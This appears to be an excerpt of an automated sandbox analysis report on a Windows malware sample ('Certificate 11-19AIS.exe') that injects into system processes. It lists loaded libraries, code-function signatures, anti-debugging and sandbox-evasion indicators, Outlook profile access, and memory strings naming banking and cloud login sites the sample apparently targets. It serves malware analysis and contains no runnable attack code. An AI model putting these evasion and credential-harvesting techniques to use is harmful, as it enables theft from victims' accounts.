            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Certificate 11-19AIS.exeStatic file information: File size 1203200 > 1048576
            Source: Certificate 11-19AIS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Certificate 11-19AIS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Certificate 11-19AIS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Certificate 11-19AIS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Certificate 11-19AIS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Certificate 11-19AIS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Certificate 11-19AIS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: auecFLppjswMvwfJiAu.exe, 00000003.00000000.1382456164.00000000003FE000.00000002.00000001.01000000.00000004.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000000.1529575482.00000000003FE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Certificate 11-19AIS.exe, 00000000.00000003.1315329322.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, Certificate 11-19AIS.exe, 00000000.00000003.1314245805.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1456858379.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1456858379.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1368323882.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366408522.0000000003000000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1456803853.0000000002C22000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1458980834.0000000002DD6000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3780872271.0000000002F80000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3780872271.000000000311E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Certificate 11-19AIS.exe, 00000000.00000003.1315329322.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, Certificate 11-19AIS.exe, 00000000.00000003.1314245805.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1456858379.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1456858379.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1368323882.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366408522.0000000003000000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000003.1456803853.0000000002C22000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1458980834.0000000002DD6000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3780872271.0000000002F80000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3780872271.000000000311E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.1425546855.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1456562010.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000003.00000003.1395481135.00000000009AB000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.3782139985.00000000035AC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3776112621.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000002.3781244509.000000000337C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1758230553.0000000006A1C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.3782139985.00000000035AC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3776112621.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000002.3781244509.000000000337C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1758230553.0000000006A1C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.1425546855.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1456562010.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000003.00000003.1395481135.00000000009AB000.00000004.00000001.00020000.00000000.sdmp
            Source: Certificate 11-19AIS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Certificate 11-19AIS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Certificate 11-19AIS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Certificate 11-19AIS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Certificate 11-19AIS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007CE01E LoadLibraryA,GetProcAddress,0_2_007CE01E
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007D6B05 push ecx; ret 0_2_007D6B18
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004048A9 push esp; ret 2_2_004048AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E2BA push 00000038h; iretd 2_2_0041E2BE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A436 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418C92 pushad ; retf 2_2_00418C93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A5D9 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004017E5 push ebp; retf 003Fh2_2_004017E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403780 push eax; ret 2_2_00403782
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004147A2 push es; iretd 2_2_004147AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340225F pushad ; ret 2_2_034027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034027FA pushad ; ret 2_2_034027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD push ecx; mov dword ptr [esp], ecx2_2_034309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340283D push eax; iretd 2_2_03402858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340135E push eax; iretd 2_2_03401369
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02F8225F pushad ; ret 4_2_02F827F9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02F827FA pushad ; ret 4_2_02F827F9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02F8283D push eax; iretd 4_2_02F82858
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FB09AD push ecx; mov dword ptr [esp], ecx4_2_02FB09B6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02F81368 push eax; iretd 4_2_02F81369
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02830CE1 pushfd ; retf 4_2_02830D0B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02822238 pushad ; iretd 4_2_02822239
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0282AB37 push 00000038h; iretd 4_2_0282AB3B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02820EAB push ebp; retf 4_2_02820EAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02826E56 push ebx; iretd 4_2_02826E7D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02826CB3 push ebx; iretd 4_2_02826E7D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0282101F push es; iretd 4_2_02821027
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0282D1B0 push es; ret 4_2_0282D1D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02811126 push esp; ret 4_2_02811127
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0282550F pushad ; retf 4_2_02825510
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0281FFA0 push esi; iretd 4_2_0281FFA5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E0429A push cs; retf 4_2_02E042F6
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_00818111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00818111
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007CEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_007CEB42
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007D123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007D123A
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeAPI/Special instruction interceptor: Address: EF38FC
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52D1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE530154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFEFE52DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E rdtsc 2_2_0347096E
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 3972Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 6000Jump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeEvaded block: after key decisiongraph_0-95271
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeEvaded block: after key decisiongraph_0-94194
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeAPI coverage: 4.5 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 8128Thread sleep count: 3972 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 8128Thread sleep time: -7944000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 8128Thread sleep count: 6000 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 8128Thread sleep time: -12000000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe TID: 8180Thread sleep time: -75000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe TID: 8180Thread sleep time: -35000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007F6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_007F6CA9
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007F60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_007F60DD
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007F63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_007F63F9
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007FEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007FEB60
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007FF56F FindFirstFileW,FindClose,0_2_007FF56F
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007FF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_007FF5FA
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_00801B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00801B2F
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_00801C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00801C8A
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_00801F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00801F94
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0282BAB0 FindFirstFileW,FindNextFileW,FindClose,4_2_0282BAB0
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007CDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007CDDC0
            Source: F56GKLK7U4.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
            Source: F56GKLK7U4.4.drBinary or memory string: tasks.office.comVMware20,11696503903o
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
            Source: netbtugc.exe, 00000004.00000002.3784418837.00000000078B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,=?{q6
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
            Source: F56GKLK7U4.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696503903}
            Source: F56GKLK7U4.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696503903x
            Source: F56GKLK7U4.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696503903h
            Source: F56GKLK7U4.4.drBinary or memory string: bankofamerica.comVMware20,11696503903x
            Source: netbtugc.exe, 00000004.00000002.3784418837.00000000078B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Transaction PasswordVMware20,11696503903}
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696503903]
            Source: F56GKLK7U4.4.drBinary or memory string: global block list test formVMware20,11696503903
            Source: F56GKLK7U4.4.drBinary or memory string: ms.portal.azure.comVMware20,11696503903
            Source: F56GKLK7U4.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
            Source: F56GKLK7U4.4.drBinary or memory string: interactivebrokers.comVMware20,11696503903
            Source: netbtugc.exe, 00000004.00000002.3784418837.00000000078B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,116
            Source: F56GKLK7U4.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696503903u
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903
            Source: F56GKLK7U4.4.drBinary or memory string: AMC password management pageVMware20,11696503903
            Source: F56GKLK7U4.4.drBinary or memory string: turbotax.intuit.comVMware20,11696503903t
            Source: netbtugc.exe, 00000004.00000002.3776112621.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.1759667400.000001E0068FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903}
            Source: F56GKLK7U4.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903x
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
            Source: F56GKLK7U4.4.drBinary or memory string: outlook.office365.comVMware20,11696503903t
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
            Source: F56GKLK7U4.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
            Source: F56GKLK7U4.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696503903
            Source: F56GKLK7U4.4.drBinary or memory string: outlook.office.comVMware20,11696503903s
            Source: F56GKLK7U4.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696503903d
            Source: auecFLppjswMvwfJiAu.exe, 00000006.00000002.3778243505.0000000001389000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
            Source: F56GKLK7U4.4.drBinary or memory string: dev.azure.comVMware20,11696503903j
            Source: F56GKLK7U4.4.drBinary or memory string: discord.comVMware20,11696503903f
            Source: F56GKLK7U4.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696503903
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeAPI call chain: ExitProcess graph end nodegraph_0-94317
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E rdtsc 2_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417823 LdrLoadDll,2_2_00417823
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_00806AAF BlockInput,0_2_00806AAF
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007B3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_007B3D19
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007E3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_007E3920
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007CE01E LoadLibraryA,GetProcAddress,0_2_007CE01E
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_00EF2548 mov eax, dword ptr fs:[00000030h]0_2_00EF2548
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_00EF3BC8 mov eax, dword ptr fs:[00000030h]0_2_00EF3BC8
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_00EF3B68 mov eax, dword ptr fs:[00000030h]0_2_00EF3B68
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov ecx, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA352 mov eax, dword ptr fs:[00000030h]2_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D8350 mov ecx, dword ptr fs:[00000030h]2_2_034D8350
